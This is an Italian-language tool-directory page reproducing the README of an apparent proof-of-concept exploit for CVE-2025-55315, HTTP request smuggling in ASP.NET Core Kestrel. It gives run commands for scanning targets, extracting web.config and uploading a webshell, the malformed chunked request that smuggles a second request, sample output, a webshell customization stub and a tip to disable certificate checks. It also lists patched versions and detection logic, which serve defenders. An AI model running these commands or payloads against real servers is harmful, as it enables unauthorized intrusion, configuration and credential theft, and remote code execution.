Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC Exploit | Kitploit
Strumenti/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC Exploit

Vedi Repository
85310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55315 Strumento di Pentest

Strumento di sfruttamento dello smuggling di richieste HTTP per ASP.NET Core Kestrel

Python Version CVE CVSS License


⚠️ AVVISO LEGALE

QUESTO STRUMENTO È SOLO PER TEST DI SICUREZZA AUTORIZZATI!

  • Utilizzare SOLO su sistemi di propria proprietà o per i quali si ha esplicita autorizzazione scritta per i test
  • L'accesso non autorizzato a sistemi informatici è ILLEGALE
  • Il creatore dello strumento NON è responsabile per un uso improprio
  • Usando questo strumento, accetti la piena responsabilità legale

📋 Panoramica

Strumento professionale per penetration testing per CVE-2025-55315 (vulnerabilità di HTTP Request Smuggling in ASP.NET Core Kestrel). Questo strumento è progettato per l'analisi di un singolo target con capacità di sfruttamento complete.

Cos'è CVE-2025-55315?

Una vulnerabilità critica di HTTP Request Smuggling nel server web ASP.NET Core Kestrel (CVSS 9.9/10) che consente agli aggressori di:

  • Bypassare l'autenticazione
  • Rubare credenziali e token di sessione
  • Eseguire Server-Side Request Forgery (SSRF)
  • Avvelenare le cache
  • Caricare webshell e ottenere esecuzione di codice remota

Versioni affette:

  • .NET Core 3.0 fino a .NET 9.0.9
  • Corretto in: .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+

✨ Caratteristiche

Funzionalità principali

  • ✅ Analisi di un singolo target - Penetration testing mirato su un target specifico
  • ✅ Scoperta automatica degli endpoint - Scopre endpoint comuni di ASP.NET Core
  • ✅ Test manuale degli endpoint - Testa endpoint specifici di interesse
  • ✅ Rilevamento vulnerabilità - Rilevamento accurato di CVE-2025-55315
  • ✅ Estrazione di web.config - Legge file di configurazione tramite request smuggling
  • ✅ Caricamento webshell - Capacità opzionale di distribuzione webshell
  • ✅ Report dettagliati - Report in formato JSON e testo
  • ✅ Funzioni di sicurezza - Molteplici richieste di conferma per azioni distruttive

Caratteristiche tecniche

  • Supporto HTTP/1.1 e HTTPS
  • Supporto porta personalizzata
  • Timeout configurabili
  • Modalità debug verbose
  • Output terminale con colori
  • Bypass della validazione del certificato SSL (per test)

🔧 Installazione

Requisiti

root@kitploit:~
# Python 3.7 or higher
python3 --version

# No external dependencies - uses only standard library

Download

root@kitploit:~
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# Make executable
chmod +x cve_2025_55315_PoC.py

🚀 Avvio Rapido

Scansione di base della vulnerabilità

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com

Questo farà:

  1. Raccogliere informazioni sul server
  2. Scoprire automaticamente gli endpoint attivi
  3. Testare ogni endpoint per CVE-2025-55315
  4. Mostrare i risultati nel terminale

Test di un endpoint specifico

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com -e /api/login

Scansione completa con estrazione di web.config

root@kitploit:~
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

Avanzato: Sfruttamento completo (Solo autorizzato!)

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 Esempi di Utilizzo

Esempio 1: Controllo rapido

Scenario: Verificare se il server di produzione è vulnerabile

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com

Durata prevista: 30-60 secondi


Esempio 2: Scansione dettagliata

Scenario: Scansione completa dell'endpoint con output verboso

root@kitploit:~
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

Durata prevista: 2-5 minuti


Esempio 3: Testare più endpoint

Scenario: Testare endpoint critici specifici

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

Esempio 4: Target senza SSL

Scenario: Testare un server HTTP interno

root@kitploit:~
python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 Opzioni della riga di comando

root@kitploit:~
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

Required Arguments:
  -t, --target         Target hostname or URL (e.g., target.com)

Optional Arguments:
  -p, --port           Port number (default: 443 for SSL, 80 for non-SSL)
  -e, --endpoint       Specific endpoint(s) to test (can be used multiple times)
  --no-ssl             Disable SSL/HTTPS (use HTTP)
  --read-config        Attempt to read web.config file
  --upload-shell       Attempt webshell upload (requires confirmation)
  -o, --output         Save report to file
  -v, --verbose        Enable verbose output
  --timeout            Socket timeout in seconds (default: 10)
  -h, --help           Show help message

🔍 Interpretazione dell'Output

Esempio di sistema vulnerabile

root@kitploit:~
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

Interpretazione:

  • 🔴 VULNERABILITÀ CRITICA RILEVATA
  • 🔴 Molteplici endpoint sono vulnerabili
  • 🔴 Il file di configurazione è stato estratto con successo
  • ⚡ URGENTE: Aggiornare a .NET 8.0.21+ o 9.0.10+

Esempio di sistema sicuro

root@kitploit:~
Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

Interpretazione:

  • ✅ IL SISTEMA È SICURO
  • ✅ Esecuzione di versione Kestrel patchata
  • ✅ Tutte le richieste malformate rifiutate

🛡️ Sicurezza ed Etica

Checklist di autorizzazione

Prima di eseguire questo strumento, assicurati:

  • Possiedi il sistema target, OPPURE
  • Hai un'autorizzazione scritta per testare, E
  • Il team di sicurezza è stato informato, E
  • Hai un piano di rollback, E
  • Comprendi le implicazioni legali

Funzioni di sicurezza integrate

  1. Conferma in due fasi - Lo strumento chiede autorizzazione prima di iniziare
  2. Conferma caricamento webshell - Richiede di digitare "YES" in maiuscolo
  3. Limitazione della velocità - Ritardi tra le richieste durante l'auto-scoperta
  4. Protezione timeout - Previene connessioni in sospeso
  5. Registrazione dettagliata - Tutte le azioni sono registrate per tracciabilità

🔬 Dettagli Tecnici

Tecnica di sfruttamento

Lo strumento sfrutta CVE-2025-55315 utilizzando una codifica di trasferimento chunked malformata:

root@kitploit:~
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← This becomes a separate request
Host: target.com

Perché funziona:

  1. Server proxy vede \n come terminatore di riga → elabora come singola richiesta
  2. Kestrel (vulnerabile) ignora \n → tratta il GET contrabbandato come richiesta separata
  3. La richiesta contrabbandata può essere eseguita nel contesto di sessione di un altro utente

Logica di rilevamento

Risposta del serverInterpretazioneStato
400 Bad RequestKestrel ha rifiutato chunk malformato✅ Sicuro (patchato)
Multiple HTTP/1.1Ricevute due risposte separate❌ Vulnerabile
500 o 502Errore interno del server⚠️ Probabilmente vulnerabile
Normale 200 OKRichiesta accettata⚠️ Inconcludente

🐛 Risoluzione dei Problemi

Connessione fallita

root@kitploit:~
[ERROR] Connection failed: [Errno 111] Connection refused

Soluzioni:

  • Verifica che il target sia raggiungibile: ping target.com
  • Controlla che il numero di porta sia corretto
  • Prova con/senza SSL: --no-ssl
  • Controlla le regole del firewall

Errore certificato SSL

root@kitploit:~
[ERROR] Connection failed: certificate verify failed

Soluzione: Lo strumento disabilita già la verifica del certificato. Se il problema persiste:

root@kitploit:~
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com

Errori di timeout

root@kitploit:~
[WARNING] No response - possible timeout

Soluzioni:

  • Aumenta il timeout: --timeout 30
  • Controlla la connettività di rete
  • Il target potrebbe essere lento o sovraccarico

Caricamento bloccato

root@kitploit:~
[WARNING] Upload blocked (forbidden/method not allowed)

Spiegazione:

  • La configurazione del server blocca i metodi PUT/POST
  • WAF/IPS sta bloccando il caricamento
  • I permessi dei file impediscono la scrittura

Questo è normale - non tutti i sistemi vulnerabili consentono il caricamento di file.


📚 Riferimenti

Risorse CVE-2025-55315

  1. Microsoft Security Advisory: https://github.com/dotnet/aspnetcore/issues/64033

  2. NVD Database: https://nvd.nist.gov/vuln/detail/CVE-2025-55315

  3. Praetorian Research ($10k Bug Bounty): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/

  4. Andrew Lock's Technical Analysis: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/

HTTP Request Smuggling

  1. PortSwigger Research: https://portswigger.net/web-security/request-smuggling

  2. OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling


🔄 Personalizzazione

Aggiungere endpoint personalizzati

Modifica COMMON_ENDPOINTS nello script:

root@kitploit:~
COMMON_ENDPOINTS = [
    '/your/custom/endpoint',
    '/api/myapp/admin',
    # Add your endpoints here
]

Usare una webshell personalizzata

Modifica il metodo upload_webshell():

root@kitploit:~
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
                   shell_content: str = None):
    if not shell_content:
        shell_content = '''
        <!-- Your custom ASPX webshell here -->
        '''

📝 Segnalazione Problemi

Se trovi bug o hai suggerimenti:

  1. Esegui con modalità verbose: -v
  2. Salva l'output completo: -o debug.txt
  3. Includi:
    • Versione di Python
    • Comando utilizzato
    • Messaggio di errore
    • Comportamento atteso vs effettivo

⚖️ Disclaimer Legale

root@kitploit:~
THIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.

THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice

BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles

UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!

🎓 Scopo Educativo

Questo strumento è stato creato per:

  • Ricercatori di sicurezza
  • Penetration tester
  • Cacciatori di bug bounty
  • Amministratori di sistema
  • Formazione sulla consapevolezza della sicurezza
  • Valutazioni di sicurezza autorizzate

NON per:

  • Attacchi dannosi
  • Accesso non autorizzato
  • Ricognizione competitiva
  • Qualsiasi attività illegale

🙏 Ringraziamenti

  • Microsoft Security Response Center - Per la divulgazione CVE e le patch
  • Praetorian Security - Per la ricerca originale sulla vulnerabilità
  • Andrew Lock - Per l'analisi tecnica dettagliata
  • Comunità della sicurezza - Per le pratiche di divulgazione responsabile

📄 Licenza

Solo per test di sicurezza educativi e autorizzati

Questo strumento è fornito per scopi educativi e test di sicurezza autorizzati. L'uso commerciale, la ridistribuzione o l'uso per scopi dannosi sono strettamente vietati.


🔐 Avviso Finale

root@kitploit:~
╔═════════════════════════════════════════════════════════════╗
║                                                             ║
║  USE THIS TOOL RESPONSIBLY AND LEGALLY!                     ║
║                                                             ║
║  Unauthorized access to computer systems is a CRIME.        ║
║  Always obtain written permission before testing.           ║
║  Follow responsible disclosure practices.                   ║
║                                                             ║
║  Happy (Legal) Hacking!                                     ║
║                                                             ║
╚═════════════════════════════════════════════════════════════╝

Scarica lo strumento